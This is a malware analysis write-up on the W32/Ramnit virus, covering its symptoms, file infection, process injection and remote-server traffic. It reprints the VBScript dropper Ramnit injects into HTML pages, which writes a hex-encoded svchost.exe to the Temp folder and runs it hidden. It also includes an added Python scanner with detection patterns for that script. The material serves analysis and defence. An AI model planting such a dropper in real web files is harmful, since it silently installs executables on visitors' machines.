Some symptoms that occur if you are already infected are:
* Pop-up ads or pop-ups with pornographic / gambling content
At certain times, the browser opens pop-up ads or pop-ups that contain pornographic or gambling (casino) content. This can make using the computer uncomfortable. (see Image 2)
Image2, Pop-up ads run by W32/Ramnit
* A script error or error pop-up appears after the pop-up ads
After the pop-up ads appear, a pop-up error or script error from the browser follows. This script error resembles the one shown by the "ARP spoofing" virus in 2008. (see Image 3)
Image3, Pop-up error or script error
Like the Sality, Alman and Virut malware variants, W32/Ramnit infects exe files. Unlike them, W32/Ramnit also infects DLL (dynamic link library) files.
Infected exe and dll files grow by 100-120 kb, depending on the Ramnit variant that infects them. However, not all exe and dll files are infected.
* HTML file injection
Besides infecting exe files and so on, W32/Ramnit also injects HTML files. The injection adds a header and a footer. (see Image 4 and 5)
In the header, W32/Ramnit adds the script:
DropFileName = "svchost.exe"
Image4, the script is added to the header of the HTML file
In the footer, W32/Ramnit adds the script:
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath) = False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
Image5, the script is added to the footer of the HTML file
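A defender can check HTML files for this injection by looking for the combination of strings in the script above. The following is an added example, not code from the original post: the `WriteData = "<hex>"` assignment form, the MZ check on the decoded bytes and both sample documents are assumptions constructed for illustration.

```python
import re

# Indicators taken from the injected VBScript quoted above.
MARKERS = {
    "drop_name": re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.I),
    "fso": re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"', re.I),
    "temp_dir": re.compile(r'GetSpecialFolder\s*\(\s*2\s*\)', re.I),  # 2 = Temp folder
    "hex_decode": re.compile(r'CLng\s*\(\s*"&H"', re.I),
    "run_hidden": re.compile(r'\.Run\s+DropPath\s*,\s*0', re.I),
}
# Assumption: the blob is assigned as WriteData = "<hex>"; the page only shows it being read.
WRITEDATA = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]+)"', re.I)

def scan_html(text):
    """Return which dropper indicators an HTML document contains."""
    hits = {name: bool(rx.search(text)) for name, rx in MARKERS.items()}
    name = MARKERS["drop_name"].search(text)
    blob = WRITEDATA.search(text)
    payload_is_pe = None
    if blob:
        hexstr = blob.group(1)
        payload = bytes.fromhex(hexstr[: len(hexstr) // 2 * 2])  # ignore a dangling nibble
        payload_is_pe = payload.startswith(b"MZ")
    return {
        "hits": hits,
        "drop_name": name.group(1) if name else None,
        "payload_is_pe": payload_is_pe,
        # Require the combination; any single string also occurs in legitimate scripts.
        "infected": hits["drop_name"] and sum(hits.values()) >= 4,
    }

# Constructed sample: script lines from this page plus a 4-byte stand-in for the blob.
SAMPLE_INFECTED = r'''<html><body>page</body></html>
DropFileName = "svchost.exe"
WriteData = "4D5A9000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))
WSHshell.Run DropPath, 0
'''
# Constructed sample: a legitimate page that happens to use one of the same objects.
SAMPLE_CLEAN = '''<html><script language="VBScript">
Set FSO = CreateObject("Scripting.FileSystemObject")
</script></html>'''

if __name__ == "__main__":
    for label, doc in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(label, scan_html(doc))
```

Requiring several indicators together keeps pages that legitimately use `Scripting.FileSystemObject` from being flagged.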
By injecting the Iexplore.exe and services.exe files and adding a script to web files (htm / html), W32/Ramnit leaves the Windows services function blank. (see Image 6)
* Makes the computer hang / slow down, and network connections may even be disconnected.
The Windows system files targeted for injection by W32/Ramnit are:
- C:\WINDOWS\system32\svchost.exe (system file associated with the network connection; injecting it disconnects the network)
- C:\WINDOWS\system32\lsass.exe (system file related to computer activity; injecting it makes the computer hang / slow)
- C:\WINDOWS\system32\services.exe (system file associated with the services and drivers that run)
- C:\Program Files\Internet Explorer\Iexplore.exe (executable file of the Internet Explorer browser)
* Active in process memory
W32/Ramnit tries to connect to the remote server using the Internet Explorer process it has injected. This can be seen in Task Manager, even though we have not opened IE / Internet Explorer. (see Image 7)
Image7, Process Iexplore.exe (Internet Explorer) that has been injected by W32/Ramnit
* Connect to Remote Server
W32/Ramnit connects to a remote server to deliver the information that server needs. Several remote servers are used for this.
* Transferring data to a remote server
Besides connecting to and communicating with a remote server, W32/Ramnit also tries to transfer data from the victim's computer to the remote server and, in the other direction, to send malware files to the victim's computer. (see Image 8)
Image8, the transfer of data between the victim's computer and remote servers
* Broadcasting
Like the Conficker worm, W32/Ramnit also broadcasts on the network. The difference is that W32/Ramnit does so to only one address, namely: ADX.ADNXS.COM (see Image 9)
Image9, Broadcast conducted by W32/Ramnit